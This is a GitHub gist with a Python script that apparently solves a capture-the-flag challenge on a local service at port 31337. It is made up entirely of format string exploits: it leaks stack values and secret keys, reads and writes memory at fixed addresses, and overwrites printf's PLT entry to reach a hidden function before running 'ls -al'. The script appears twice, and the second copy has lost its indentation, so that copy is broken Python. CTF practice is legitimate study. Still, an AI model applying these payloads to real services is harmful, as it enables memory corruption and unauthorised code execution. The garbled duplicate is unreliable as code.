isra17/gist:deee5fc85e4aecdfab08

## gistfile1.py
import socket
import struct

HOST = 'localhost'
PORT = 31337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

# challenge 1
print('challenge1')
print(s.recv(1024))
s.sendall(b'%71$08X\n')
key = s.recv(0x1024)
print(s.recv(1024))
print('key:', key)
s.sendall(struct.pack('<I', int(key, 16)))

# challenge 2
print('challenge2')
print(s.recv(0x1024))
payload = b'\xf0\xa2\x04\x08:%8$s\n'
s.sendall(payload)
data = s.recv(0x1024)
key = data.split(b':')[1][0:4]
key += b'\x00' * (4-len(key))
print(s.recv(0x1024))
print('key:', hex(struct.unpack('<I', key)[0]));
s.sendall(key)

# challenge 3
print('challenge3')
print(s.recv(0x1024))
s.sendall(b'\xec\xa2\x04\x08:%4$n\n')
print(s.recv(0x1024))
print(s.recv(0x1024))

def write_int(addr, value, offset):

    outsize = 0
    payload = b'';
    for i in range(4):
        payload += struct.pack('<I', addr+i)
    outsize = len(payload)

    pad = 256 - (outsize % 256)
    pad += (value) % 256-1
    outsize += pad
    print('pad', pad)
    payload += '%{0}x'.format(pad).encode()
    payload += ':%{0}$hhn'.format(offset).encode()

    pad = 256 - (outsize % 256)
    pad += (value >> 8) % 256-2
    outsize += pad
    payload += '%{0}x'.format(pad).encode()
    payload += ':%{0}$hhn'.format(offset+1).encode()

    pad = 256 - (outsize % 256)
    pad += (value >> 16) % 256-3
    outsize += pad
    payload += '%{0}x'.format(pad).encode()
    payload += ':%{0}$hhn'.format(offset+2).encode()

    pad = 256 - (outsize % 256)
    pad += (value >> 24) % 256-4
    outsize += pad
    payload += '%{0}x'.format(pad).encode()
    payload += ':%{0}$hhn'.format(offset+3).encode()

    payload += b'\n'
    s.sendall(payload)

#ultimate challenge
write_int(0x804a254, 0x8048b60, 4) # Rewrite printf's PLT entry with you_wish function address
print(s.recv(0x1024))
s.sendall(b'ls -al\n')
print(s.recv(0x1024))
	import socket
	import struct

	HOST = 'localhost'
	PORT = 31337
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((HOST, PORT))

	# challenge 1
	print('challenge1')
	print(s.recv(1024))
	s.sendall(b'%71$08X\n')
	key = s.recv(0x1024)
	print(s.recv(1024))
	print('key:', key)
	s.sendall(struct.pack('<I', int(key, 16)))

	# challenge 2
	print('challenge2')
	print(s.recv(0x1024))
	payload = b'\xf0\xa2\x04\x08:%8$s\n'
	s.sendall(payload)
	data = s.recv(0x1024)
	key = data.split(b':')[1][0:4]
	key += b'\x00' * (4-len(key))
	print(s.recv(0x1024))
	print('key:', hex(struct.unpack('<I', key)[0]));
	s.sendall(key)

	# challenge 3
	print('challenge3')
	print(s.recv(0x1024))
	s.sendall(b'\xec\xa2\x04\x08:%4$n\n')
	print(s.recv(0x1024))
	print(s.recv(0x1024))

	def write_int(addr, value, offset):

	outsize = 0
	payload = b'';
	for i in range(4):
	payload += struct.pack('<I', addr+i)
	outsize = len(payload)

	pad = 256 - (outsize % 256)
	pad += (value) % 256-1
	outsize += pad
	print('pad', pad)
	payload += '%{0}x'.format(pad).encode()
	payload += ':%{0}$hhn'.format(offset).encode()

	pad = 256 - (outsize % 256)
	pad += (value >> 8) % 256-2
	outsize += pad
	payload += '%{0}x'.format(pad).encode()
	payload += ':%{0}$hhn'.format(offset+1).encode()

	pad = 256 - (outsize % 256)
	pad += (value >> 16) % 256-3
	outsize += pad
	payload += '%{0}x'.format(pad).encode()
	payload += ':%{0}$hhn'.format(offset+2).encode()

	pad = 256 - (outsize % 256)
	pad += (value >> 24) % 256-4
	outsize += pad
	payload += '%{0}x'.format(pad).encode()
	payload += ':%{0}$hhn'.format(offset+3).encode()

	payload += b'\n'
	s.sendall(payload)

	#ultimate challenge
	write_int(0x804a254, 0x8048b60, 4) # Rewrite printf's PLT entry with you_wish function address
	print(s.recv(0x1024))
	s.sendall(b'ls -al\n')
	print(s.recv(0x1024))